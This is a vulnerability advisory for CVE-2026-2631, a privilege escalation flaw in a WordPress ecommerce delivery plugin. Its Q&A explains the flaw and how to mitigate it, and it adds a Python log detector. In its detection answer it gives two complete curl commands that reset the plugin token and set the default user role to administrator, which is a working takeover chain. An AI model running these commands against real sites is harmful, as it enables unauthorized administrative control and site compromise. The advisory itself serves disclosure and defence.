CVE-2026-2631
Unauthenticated REST Endpoint Allows Admin Role Escalation in Datalogics Ecommerce Plugin
Publication date: 2026-03-11
Last updated on: 2026-03-11
Assigner: WPScan
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| datalogics | ecommerce_delivery_wordpress_plugin | all versions before 2.6.60 (2.6.60 excluded) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-2631 affects the Datalogics Ecommerce Delivery WordPress plugin versions before 2.6.60. It involves an unauthenticated REST endpoint that allows any remote attacker to modify the `datalogics_token` option without verification.
This token is later used for authentication in a protected endpoint that permits arbitrary execution of WordPress's `update_option()` function. By exploiting this, an attacker can escalate privileges by enabling user registration and setting the default user role to administrator.
This means attackers can create new users who automatically have administrative privileges without any authentication. [1]
How can this vulnerability impact me?
The vulnerability allows attackers to gain administrative access to a WordPress site by enabling user registration and setting the default role to administrator.
This can lead to full site compromise, including the ability to modify site settings, install malicious plugins, steal sensitive data, or disrupt site operations.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the unauthenticated REST endpoint to update the `datalogics_token` is accessible and can be used to modify plugin options without authentication.
You can use curl commands to test the vulnerability by attempting to update the token and then check if the settings for user registration and default role can be changed.
- Test updating the token with an unauthenticated POST request:
```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-token" -H "Content-Type: application/json" -d '{"token":"NXPOC-2026"}'
```
- Attempt to update settings using the token to enable user registration and set default role to administrator:
```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-settings" -H "Content-Type: application/json" -d '{ "token":"NXPOC-2026", "settings":{ "users_can_register":"1", "default_role":"administrator" } }'
```
After running these commands, verify in the WordPress admin panel under "Settings > General" if user registration is enabled and the default role is set to administrator, which indicates the vulnerability is present. [1]
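As an added example that is not part of this record or of the plugin's own code, the following detector scans web-server access logs for POST requests to the two REST routes named above (in either the `?rest_route=` form used here or the equivalent `/wp-json/` pretty-permalink form) and rates a settings update that follows a token update from the same client within a ten-minute window as high severity. The combined log format, the sample lines and the window length are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Mar/2026:10:02:01 +0000] "POST /index.php?rest_route=/datalogics-0/v1/update-token HTTP/1.1" 200 45 "-" "curl/8.5.0"
203.0.113.5 - - [11/Mar/2026:10:02:09 +0000] "POST /index.php?rest_route=/datalogics-0/v1/update-settings HTTP/1.1" 200 61 "-" "curl/8.5.0"
198.51.100.7 - - [11/Mar/2026:10:15:30 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Mar/2026:11:00:00 +0000] "GET /index.php?rest_route=/wp/v2/posts HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The two routes named in this advisory's reproduction steps.
WATCHED = ("/datalogics-0/v1/update-token", "/datalogics-0/v1/update-settings")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry

def find_suspicious(log_text, window=timedelta(minutes=10)):
    """Return one finding per POST to a watched route. A settings update that
    follows a token update from the same IP within `window` is rated 'high'."""
    entries = (parse_line(ln) for ln in log_text.splitlines())
    posts = [e for e in entries if e and e["method"] == "POST"
             and any(w in e["target"] for w in WATCHED)]
    findings, last_token_update = [], {}
    for e in posts:
        # Works for both "?rest_route=/..." and "/wp-json/..." request targets.
        route = e["target"].split("rest_route=", 1)[-1].split("&", 1)[0]
        if route.endswith("update-token"):
            last_token_update[e["ip"]] = e["ts"]
            severity = "medium"
        else:
            prev = last_token_update.get(e["ip"])
            severity = "high" if prev and e["ts"] - prev <= window else "medium"
        findings.append({"ip": e["ip"], "route": route,
                         "status": e["status"], "severity": severity})
    return findings
```

A hit on either route from a client that is not an expected administrator is worth following up with the option checks listed in the mitigation answer below.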
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to update the Datalogics Ecommerce Delivery WordPress plugin to version 2.6.60 or later, where this vulnerability has been fixed.
Until the update can be applied, consider restricting access to the vulnerable REST endpoints by implementing firewall rules or disabling the plugin if possible.
Additionally, review and reset the `datalogics_token` option and verify that user registration and default role settings have not been maliciously altered.